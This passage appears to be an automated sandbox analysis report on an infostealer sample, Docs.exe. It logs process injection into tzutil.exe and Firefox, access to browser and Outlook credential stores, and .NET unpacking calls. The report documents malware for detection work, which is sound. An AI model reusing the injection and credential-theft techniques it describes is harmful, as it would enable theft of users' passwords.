                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A34F407_2_03A34F40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039D2E907_2_039D2E90
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7CE937_2_03A7CE93
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7EEDB7_2_03A7EEDB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7EE267_2_03A7EE26
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C0E597_2_039C0E59
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039D8DBF7_2_039D8DBF
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039BADE07_2_039BADE0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039CAD007_2_039CAD00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A5CD1F7_2_03A5CD1F
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A60CB57_2_03A60CB5
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039B0CF27_2_039B0CF2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C0C007_2_039C0C00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A0739A7_2_03A0739A
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7132D7_2_03A7132D
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039AD34C7_2_039AD34C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C52A07_2_039C52A0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A612ED7_2_03A612ED
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039DB2C07_2_039DB2C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039CB1B07_2_039CB1B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A8B16B7_2_03A8B16B
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039AF1727_2_039AF172
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039F516C7_2_039F516C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7F0E07_2_03A7F0E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A770E97_2_03A770E9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C70C07_2_039C70C0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A6F0CC7_2_03A6F0CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7F7B07_2_03A7F7B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A716CC7_2_03A716CC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A056307_2_03A05630
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A5D5B07_2_03A5D5B0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A895C37_2_03A895C3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A775717_2_03A77571
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7F43F7_2_03A7F43F
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039B14607_2_039B1460
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039DFB807_2_039DFB80
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A35BF07_2_03A35BF0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039FDBF97_2_039FDBF9
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7FB767_2_03A7FB76
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A05AA07_2_03A05AA0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A61AA37_2_03A61AA3
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A5DAAC7_2_03A5DAAC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A6DAC67_2_03A6DAC6
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A33A6C7_2_03A33A6C
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A77A467_2_03A77A46
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7FA497_2_03A7FA49
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A559107_2_03A55910
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C99507_2_039C9950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039DB9507_2_039DB950
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C38E07_2_039C38E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A2D8007_2_03A2D800
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C1F927_2_039C1F92
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7FFB17_2_03A7FFB1
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7FF097_2_03A7FF09
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C9EB07_2_039C9EB0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039DFDC07_2_039DFDC0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A77D737_2_03A77D73
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_039C3D407_2_039C3D40
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A71D5A7_2_03A71D5A
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A7FCF27_2_03A7FCF2
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03A39C327_2_03A39C32
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032121307_2_03212130
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0320B3E07_2_0320B3E0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0320D2707_2_0320D270
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0320B2907_2_0320B290
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0320D0487_2_0320D048
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0320D0507_2_0320D050
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032157F07_2_032157F0
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03213A007_2_03213A00
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_032139FB7_2_032139FB
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_0322BD507_2_0322BD50
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE5447_2_03CDE544
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE4267_2_03CDE426
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDD9A87_2_03CDD9A8
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDE8DC7_2_03CDE8DC
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: 7_2_03CDCC487_2_03CDCC48
                      Source: C:\Users\user\Desktop\Docs.exeCode function: String function: 015E5130 appears 58 times
                      Source: C:\Users\user\Desktop\Docs.exeCode function: String function: 0161EA12 appears 86 times
                      Source: C:\Users\user\Desktop\Docs.exeCode function: String function: 0162F290 appears 105 times
                      Source: C:\Users\user\Desktop\Docs.exeCode function: String function: 0159B970 appears 280 times
                      Source: C:\Users\user\Desktop\Docs.exeCode function: String function: 015F7E54 appears 111 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039F5130 appears 58 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 039AB970 appears 280 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03A3F290 appears 105 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03A07E54 appears 111 times
                      Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 03A2EA12 appears 86 times
                      Source: Docs.exe, 00000000.00000002.2061144742.0000000000E9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Docs.exe
                      Source: Docs.exe, 00000000.00000000.2027917488.0000000000856000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameowNk.exe4 vs Docs.exe
                      Source: Docs.exe, 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
                      Source: Docs.exe, 00000000.00000002.2065086730.0000000008B60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Docs.exe
                      Source: Docs.exe, 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
                      Source: Docs.exe, 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Docs.exe
                      Source: Docs.exe, 00000003.00000002.2596435767.0000000001127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs Docs.exe
                      Source: Docs.exe, 00000003.00000002.2596611409.000000000169D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Docs.exe
                      Source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs Docs.exe
                      Source: Docs.exeBinary or memory string: OriginalFilenameowNk.exe4 vs Docs.exe
                      Source: Docs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, DQWwse1XRyErqWj6ZE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, DQWwse1XRyErqWj6ZE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@6/3
                      Source: C:\Users\user\Desktop\Docs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Docs.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                      Source: Docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Docs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tzutil.exe, 00000007.00000002.3288094917.0000000003594000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778907770.0000000003572000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778907770.0000000003594000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2778791386.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3288094917.00000000035C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: Docs.exeReversingLabs: Detection: 36%
                      Source: unknownProcess created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
                      Source: C:\Users\user\Desktop\Docs.exeProcess created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\Docs.exeProcess created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Docs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Docs.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Docs.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: owNk.pdbSHA256k source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdbGCTL source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hrhhgLQrQIpiVv.exe, 00000006.00000002.3287825092.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3287843447.00000000003CE000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: Docs.exe, Docs.exe, 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, tzutil.exe, 00000007.00000002.3289407600.0000000003980000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000002.3289407600.0000000003B1E000.00000040.00001000.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2599187804.00000000037CF000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000007.00000003.2596619610.0000000003613000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: owNk.pdb source: tzutil.exe, 00000007.00000002.3290025914.000000000405C000.00000004.10000000.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000000.2666355182.0000000002D9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2885351736.00000000196EC000.00000004.80000000.00040000.00000000.sdmp, Docs.exe
                      Source: Binary string: tzutil.pdb source: Docs.exe, 00000003.00000002.2596435767.0000000001108000.00000004.00000020.00020000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3288966873.00000000015D8000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, kAOj1Y7pfP90kycNNw.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Docs.exe.3b970e8.4.raw.unpack, LLRcuY9QD6tGN0vbZw.cs.Net Code: UPBpNEXTKV System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Docs.exe.7030000.5.raw.unpack, GtaAIbrHXObmMm8GPA.cs.Net Code: vaH8QmOOp System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Docs.exe.8b60000.6.raw.unpack, LLRcuY9QD6tGN0vbZw.cs.Net Code: UPBpNEXTKV System.Reflection.Assembly.Load(byte[])
                      Source: Docs.exeStatic PE information: 0x8293E54F [Fri Jun 3 16:16:15 2039 UTC]
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 0_2_00E8EFB0 push esp; iretd 0_2_00E8EFB1
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004031D0 push eax; ret 3_2_004031D2
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_004169E7 push 0F6CFD2Bh; ret 3_2_00416A18
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00423A0A push esp; ret 3_2_00423A0D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00419359 push ds; ret 3_2_0041935B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00418366 pushad ; iretd 3_2_00418367
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00408325 push dword ptr [ebx+5Dh]; ret 3_2_0040830B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00417388 push edi; ret 3_2_0041738D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00419477 push edx; ret 3_2_00419485
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00408403 push 00000074h; iretd 3_2_0040840B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00417411 push eax; ret 3_2_00417414
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00411D6F push ds; iretd 3_2_00411DBD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00411D7B push ds; iretd 3_2_00411DBD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0041758A push ebp; ret 3_2_004175A6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0040D66A push ecx; iretd 3_2_0040D6D9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00414E05 push cs; retf 3_2_00414E14
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0040860D push cs; retf 3_2_0040860E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00413E93 pushfd ; ret 3_2_00413F00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_00413EBC pushfd ; ret 3_2_00413F00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0157225F pushad ; ret 3_2_015727F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015727FA pushad ; ret 3_2_015727F9
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A09AD push ecx; mov dword ptr [esp], ecx3_2_015A09B6
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0157283D push eax; iretd 3_2_01572858
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0157135E push eax; iretd 3_2_01571369
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359AB76 push 0F6CFD2Bh; ret 6_2_0359ABB0
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_03599B82 push ebp; iretd 6_2_03599B83
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_03598054 pushfd ; ret 6_2_03598098
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_03591802 push ecx; iretd 6_2_03591871
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_0359802B pushfd ; ret 6_2_03598098
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_03595F13 push ds; iretd 6_2_03595F55
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeCode function: 6_2_03595F07 push ds; iretd 6_2_03595F55
                      Source: Docs.exeStatic PE information: section name: .text entropy: 7.815105086784425
